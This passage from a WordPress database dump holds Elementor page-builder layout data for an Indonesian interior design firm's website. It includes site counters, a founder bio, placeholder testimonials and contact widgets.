center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#242424\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.8,\"sizes\":[]},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"170\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4971895\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":30},\"elements\":[{\"id\":\"22aaaa7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Challenges in deploying\\ninterior design applications\",\"align\":\"center\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"800\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"16\",\"bottom\":\"0\",\"left\":\"16\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_element_custom_width\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":42,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fe7bd92\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"Get your quote or WhatsApp: \",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"6dcb687\",\"phone_label\":\"0822 9777 5589\",\"phone_address\":\"082297775589\"}],\"alignment\":\"center\",\"label_color\":\"#FFFFFF\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"label_typography_font_weight\":\"700\",\"label_margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display\":\"inline-flex\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"700\",\"info_color\":\"#E3B25A\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display_mobile\":\"inline-block\",\"alignment_mobile\":\"center\",\"info_item_alignment_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"1dbd858\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact with us\",\"background_color\":\"#FFFFFF\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"38\",\"bottom\":\"18\",\"left\":\"38\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"button_text_color\":\"#2D2D2D\",\"hover_color\":\"#FFFFFF\",\"button_bg_hover\":\"#E3B25A\",\"_animation\":\"none\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a9e80df\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-66\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"c5b31d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1ecd2ea\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"40\",\"box_shadow_box_shadow_type\":\"yes\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":10,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.1)\"},\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"50\",\"bottom\":\"40\",\"left\":\"50\",\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-110\",\"left\":0,\"isLinked\":false},\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-couter.png\",\"id\":3570,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"%\",\"size\":-290,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":120,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":53,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":71,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"30\",\"bottom\":\"40\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[{\"id\":\"617f43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ac2aeba\",\"elType\":\"widget\",\"settings\":{\"title\":\"Project Completed\",\"icon\":{\"value\":\"flaticon flaticon-architect-1\",\"library\":\"flaticon\"},\"number\":6800},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"431e0f1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"da1e266\",\"elType\":\"widget\",\"settings\":{\"title\":\"Architectures\",\"number\":906,\"icon\":{\"value\":\"flaticon flaticon-architect\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"5255259\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"083da50\",\"elType\":\"widget\",\"settings\":{\"title\":\"Service providing\",\"number\":200,\"icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"944a539\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"d0e2ce9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy customers\",\"number\":9760,\"icon\":{\"value\":\"flaticon flaticon-satisfaction\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4388608\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b6b9eaa\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a2ebcc\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our Architects\",\"title\":\"Our expert team\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"9d2f9e3\",\"elType\":\"widget\",\"settings\":{\"info_background_background\":\"classic\",\"info_background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-lines-team.png\",\"id\":937,\"alt\":\"\",\"source\":\"library\"},\"info_background_position\":\"top right\",\"info_background_repeat\":\"no-repeat\",\"total_count\":6,\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"ova_team\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7836724\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b90ed21\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b88a577\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01.png\",\"id\":752,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ad43d0d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"35d31c6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02.png\",\"id\":753,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0eaabe3\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4c51b79\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03.png\",\"id\":754,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ee06889\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"02c4aae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04.png\",\"id\":755,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c6b5264\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c3c96cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05.jpg.png\",\"id\":757,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6720e69\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"77fc613\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06.png\",\"id\":756,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(3936,4880,'_elementor_page_assets','a:1:{s:6:\"styles\";a:4:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";}}'),(3937,4880,'_elementor_pro_version','3.8.1'),(3938,4881,'_wp_page_template','elementor_header_footer'),(3939,4881,'_elementor_edit_mode','builder'),(3940,4881,'_elementor_template_type','wp-page'),(3941,4881,'_elementor_version','3.8.1'),(3942,4881,'_elementor_data','[{\"id\":\"013ca3e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-section-1.png\",\"id\":3589,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center right\",\"background_repeat\":\"no-repeat\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false},\"background_position_tablet\":\"top right\",\"background_size\":\"auto\",\"gap\":\"no\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"b6a844e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50.684,\"_inline_size_tablet\":100,\"align\":\"flex-end\",\"align_tablet\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-right\",\"animation_tablet\":\"none\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"56708b8\",\"elType\":\"widget\",\"settings\":{\"template\":\"template_2\",\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-get-to-know-us.jpg\",\"id\":710,\"alt\":\"\",\"source\":\"library\"},\"show_line_left\":\"yes\",\"text_left\":\"Architect\",\"text_left_margin\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"image_width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_height_mobile\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"line_width_left_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"1829eb5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":49.316,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-left\",\"animation_tablet\":\"none\"},\"elements\":[{\"id\":\"2733af6\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"John Alan\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"dcb995a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Pengusaha di bidang kontraktor, konsultan interior design, property developer, hotel dan F&amp;B yang telah berpengalaman sejak tahun 2005.<\\/p><p>Selain sebagai pengusaha, John Alan juga merupakan business coach yang aktif dalam mengembangkan komunitas wirausaha dan telah berkolaborasi dengan para pakar di berbagai industri.<\\/p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2eb768f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Konsultasi perencanaan & interior design\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"ced22e0\"},{\"text\":\"Penyusunan Rencana Anggaran Belanja\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Produksi furniture dan pekerjaan sipil\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"space_between\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"space_between_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"icon_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"f3caa1a\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\"},\"elements\":[{\"id\":\"697046f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":20},\"elements\":[{\"id\":\"4b2c591\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/09\\/john_allan.jpg\",\"id\":4839,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_element_width\":\"auto\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"_border_color\":\"#E3B25A\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"9b875c0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":79.92,\"space_between_widgets\":10},\"elements\":[{\"id\":\"1150f91\",\"elType\":\"widget\",\"settings\":{\"title\":\"John Alan\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"header_size\":\"h3\",\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"23ae2ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"CO - FOUNDER\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e8e90de\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5b19198\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d460dea\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking about BauHaus\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"da0b416\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"11f956f\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"d232423\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#E3B25A\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"8056628\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\",\"_id\":\"51a9c88\"}],\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9c560b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"63f0bcf\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9b446cc\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"94218cd\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"9ac0b32\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"f80af3e\"}],\"background_item_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"-15\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"bounceInUp\",\"_animation_tablet\":\"none\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"dot_control\":\"yes\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5079813\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-contact-with-us.jpg\",\"id\":2653,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#242424\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.8,\"sizes\":[]},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"170\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4971895\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":30},\"elements\":[{\"id\":\"22aaaa7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Challenges in deploying\\ninterior design 